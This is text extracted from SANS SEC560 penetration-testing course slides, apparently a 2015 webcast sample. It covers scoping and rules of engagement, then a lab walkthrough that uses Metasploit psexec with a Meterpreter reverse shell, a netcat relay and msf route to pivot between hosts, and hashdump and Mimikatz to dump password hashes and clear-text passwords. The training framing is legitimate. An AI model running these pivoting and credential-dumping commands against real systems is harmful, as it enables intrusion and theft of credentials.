Upload
others
View
3
Download
0
Embed Size (px)
Citation preview
1
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
1
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
2
A Taste of SANS SEC 560: Adventures in High-Value Pen Testing
Copyright 2015, All Rights Reserved Version 2Q15
SANS Security 560
Network Penetration Testing and Ethical Hacking
2
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
3
Ed Skoudis
ed.skoudis
• For Ed Skoudis to introduce himself as: - A penetration tester and incident handler - An SANS Instructor - A course author: SANS SEC504 & SEC560 - The SANS Pen Test Curriculum Lead - Director of NetWars & CyberCity projects
Ed Skoudis
04/06/2015
Ed Skoudis
04/06/2015
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
4
3
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
5
SEC 560 Course Outline
• 560.1: Comprehensive Planning, Scoping, and Recon
• 560.2: In-Depth Scanning • 560.3: Exploitation & Post Exploitation • 560.4: Password Attacks & Merciless
Pivoting • 560.5: Wireless and Web Apps • 560.6: Full-Day Pen Test Lab and Capture
the Flag Contest
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
6
About the SANS SEC 560 Course
• Our focus is on helping you master the skills needed for hands-on network penetration testing and ethical hacking – Organized around the workflow of professional
testers – Numerous hands-on labs, culminating in a full-
day end-to-end penetration test in 560.6 – Tips for avoiding common pitfalls
• And saving time to make the tester more efficient and to make the test safer
4
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
7
A Formal Penetration Testing Definition
• Penetration testing involves modeling the techniques used by real-world computer attackers … – To find vulnerabilities … – And, under controlled circumstances, to exploit
those flaws ... – In a professional, safe manner according to a
carefully designed scope and rules of engagement ...
– To determine business risk and potential impact ... all with the goal of helping the organization improve security practices
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
8
Why Exploitation?
• False positive reduction / elimination – But, even if exploit doesn’t work, you still may
want to report on detected vulnerability • Proof of vulnerability and therefore more
realistic treatment of risk • Use of one machine as a pivot point to get
deeper inside the network – More of a sense of what a real bad guy can
accomplish
• Exploitation leads to post-exploitation… – …which really helps us understand the
business risks that the target organization faces due to discovered vulnerabilities
Firewall DMZ
System
Internal System
Firewall DMZ
System
Internal System
5
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
9
Risks of Exploitation • Service crash • System crash • System stability impacted • System integrity violated • Data exposure with legal ramifications
– As a penetration tester, you likely do not want to be in possession of millions of credit card numbers or other similarly sensitive information
• Inadvertently accessing the wrong system – Out of scope or even the wrong target organization
• Because of these concerns, verify that exploitation is allowed by Rules of Engagement – And… double check for a given system whether it is in scope
• Also, understand the probabilistic nature of exploit success
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
10
The Metasploit Arsenal • Metasploit divides up
the concept of exploits, payloads, auxiliary, and post modules – An exploit takes
advantage of a flaw in a target program
– The payload makes the target do something the attacker wants
– Auxiliary modules perform all kinds of tasks, including scanning
– A post module is used in post-exploitation to plunder targets or manipulate them Exploit 2 Payload 1 Launcher Send to target
Exploit 1
Exploit 2
.
.
.
Exploit N
Payload 1
Payload 2
.
.
.
Payload M
User Interface
Choose
Exploit Collection
Payload Collection
Aux 1
Aux 2
.
.
.
Aux N
Auxiliary Modules
Post 1
Post 2
.
.
.
Post N
Post Modules
6
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
11
Metasploit psexec Module • Metasploit includes a fantastic psexec module
– It's an exploit module, although it is not really exploiting a specific vulnerability
– Establishes an SMB session with the target RHOST using a provided admin-level SMBUser and SMBPass, causing the target to run a specified Metasploit payload
• Writes an executable into the target file system, creates a service with a pseudo-random name, runs the payload with local SYSTEM privileges, and then automatically removes the executable and service, cleaning up after itself
– Select it at msfconsole using: msf > use exploit/windows/smb/psexec
– Also supports pass-the-hash, authenticating to target via an admin username and hash
– This module IS ONE OF THE MOST USEFUL IN ALL OF METASPLOIT, especially in a well-patched Windows internal network environment
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
12
Psexec & the Pen Tester’s Pledge
7
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
13
• Metasploit includes a “route” command to pivot through an already-exploited host via a Meterpreter session – Carries follow-on exploits and payloads across Meterpreter session – Don’t confuse this with the Meterpreter “route” command, which
manages routing tables on a compromised system running Meterpreter
Meterpreter Functionality: Pivoting using Metasploit’s Route Command
msf > use [exploit1] msf > set RHOST [victim1] msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > exploit meterpreter > (CTRL-Z to background session… will display meterpreter sid)
msf > route add [victim2_subnet] [netmask] [sid] msf > use [exploit2] msf > set RHOST [victim2] msf > set PAYLOAD [payload2] msf > exploit
Victim1
Exploit1 Meterpreter
Pen Tester Victim2
Exploit2 Payload2
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
14
Sending SMB Through a Netcat Relay to Pivot through Linux
Attacker
Linux Relay Machine
Target Windows
SMB client
nc listener
nc client
SMB Service
C:\> net use \\Linux\c$ [password] /u:[user]
# mknod backpipe p # nc –l –p 445 0<backpipe | nc 10.10.10.10 445 | tee backpipe
Mount Share, Psexec,
Grab hashes, etc.
8
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
15
Dumping Authentication Information from Memory with Mimikatz
• Mimikatz was created by Benjamin Delpy (also known as gentilkiwi)
• Pulls authentication information from memory on a Windows machine – Searches through LSASS memory
of various specific locations, looking for password hashes and ***clear text passwords***
• Originally, a separate executable (mimikatz.exe) to load on a target machine and run
• Now, it’s a Metasploit Meterpreter module
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
16
Course Roadmap • Motivation and Defs • Password Attack Tips • Account Lockout • Password Guessing with THC-Hydra
Ø Lab: Hydra • Password Representation Formats • Obtaining Hashes
Ø Lab: Fgdump & Netcat Pivot Hashdump
• More Hash Dumping Options Ø Lab: Msf psexec & Mimikatz
• John the Ripper Ø Lab: John the Ripper
• Cain Ø Lab: Cain
• Rainbow Table Attacks Ø Lab: Ophcrack
• Pass-the-Hash Attacks Ø Lab: Pass-the-Hash
• Planning and Recon • Scanning • Exploitation &
Post-Exploitation • Password Attacks • Wireless Attacks • Web App Attacks
9
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
17
Using MSF psexec, a Netcat relay, Meterpreter, & hashdump
10.10.10.20
Target 2 Windows
SMB Services
TCP 445
Your Linux
10.10.75.1 Compromised
Linux DMZ Target
10.10.10.10 Target 1 Windows
Metasploit
nc listener
nc client
psexec
Meterpreter hashdump
TCP 4545
TCP 445
TCP 80
SMB Services
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
18
Launching Metasploit and Choosing psexec Module
10
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
19
Configuring Metasploit (1)
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
20
Configuring Metasploit (2)
Your Linux
10.10.75.1 Linux Target
10.10.10.10
Windows
Metasploit
nc nc
psexec
Meterpreter
TCP 4545
TCP 445
TCP 80
SMB
11
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
21
Preparing the Relay & Exploiting
Look at the details of this session’s connection,
between 10.10.10.10 and your Linux box.
Meterpreter
Your Linux
10.10.75.1 Linux Target
10.10.10.10 Windows
Metasploit
nc nc psexec
TCP 4545
TCP 445
TCP 80
SMB
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
22
Dumping the Hashes
Note that “run hashdump” can also
dump Windows password hints that users create, if they
are present.
12
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
23
Using msf route to Pivot and Mimikatz • Let’s use the msf route command to pivot across our
Meterpreter session on 10.10.10.10 to attack 10.10.10.20 – Getting Meterpreter on 10.10.10.20, and then loading Mimikatz
Your Linux
10.10.10.10 DMZ Target
Windows
Metasploit
Existing Meterpreter Session TCP
80
10.10.10.20 DMZ Target
Windows
Msf route to pivot SMB thru 10.10.10.10
for psexec on 10.10.10.20
New Meterpreter Session
TCP 445 allowed from 10.10.10 net
TCP 443
Load Mimikatz and dump hashes & passwords
SMB Services
SMB Services
10.10.75.1 Compromised
Linux DMZ Target
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
24
Background Session & Prepare to Attack 10.10.10.20
Your Linux
10.10.10.10
Windows
Metasploit
Existing Meterpreter
Session TCP 80
10.10.10.20
Windows
Msf route to pivot SMB thru 10.10.10.10
for psexec on 10.10.10.20
New Meterpreter Session TCP
443 SMB
SMB
TCP 445
10.10.75.1 Linux Target
13
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
25
Exploit 10.10.10.20 through Pivot
Don’t worry about this “Exploit failed” warning. As long as you see “Session N
created”… it worked. As long as you see the “meterpreter >” prompt
here, it worked.
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
26
Get System Info
Our session is with 10.10.10.20!
Your Linux
10.10.10.10
Windows
Existing Meterpreter
Session TCP 80
10.10.10.20
Windows
New Meterpreter Session TCP
443 Load Mimikatz and dump hashes & passwords
SMB
SMB
Metasploit
14
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
27
Load Mimikatz and Dump Passwords
Clear text password below!
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
28
Exiting & Lab Conclusions
• In this lab, we’ve seen how to use Metasploit’s psexec module to deliver a Meterpreter payload through a Netcat relay so that we can dump hashes
• And, we’ve seen how we can use a Metasploit route to pivot through a target machine to load Mimikatz to dump clear-text passwords
15
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
29
Webcast Conclusions
• Pen testing can help a target organization better understand its risk posture and manage risks
• Penetration testers can take advantage of plentiful tools and techniques in our work: – Metasploit and the Meterpreter – Psexec for code execution via SMB – Netcat relays and msfconsole route for pivots – Hashdump and Mimikatz for credentials
• Know your tools in-depth, and never lose your focus on providing as much business value as you can in your penetration test!
It’s not the weapon that’s important.
It’s the Ninja wielding it.
SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
30